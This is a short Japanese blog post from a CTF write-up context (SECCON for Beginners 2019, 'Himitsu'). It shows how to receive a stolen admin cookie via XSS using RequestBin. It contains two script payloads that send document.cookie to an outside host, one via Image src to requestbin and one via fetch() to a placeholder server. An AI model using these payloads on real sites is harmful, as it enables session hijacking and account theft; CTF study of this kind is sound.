前置き

SECCON for Beginners ctf 2019で、Himitsuという問題が出題されました。とりあえず、そのWrite-upに関しては他の方のを参考にしてください。

で、この問題管理人のcookieを奪うために、XSSでcookieを自分のサーバに送ってもらう処理を書かなければいけないのですが、あいにく自分のサーバを立てていないので壁にぶつかります。その時の解決法書きます。

RequestBin

このサイトです。

このサイトはリクエストを受け取れる場所を生成し、その内容を見ることができます。APIを試し打ちしてみるなどの用途がありそうです。で、ここにアクセスする際にパラメータにcookieを含めるよう設定したらOKです。

<script>(new Image).src='http://requestbin.fullcontact.com/xxxxxxx?'+document.cookie</script>

あくまでHTTPのサイトなので、HTTPSからのリクエスト出せなさそう？下のスクリプトはエラーでリクエストが飛びません。

<script>fetch('http://<my_server>/?'+document.cookie)</script>

他にも色々やり方はあると思います。が、知識不足なので例があげられませんごめんなさい。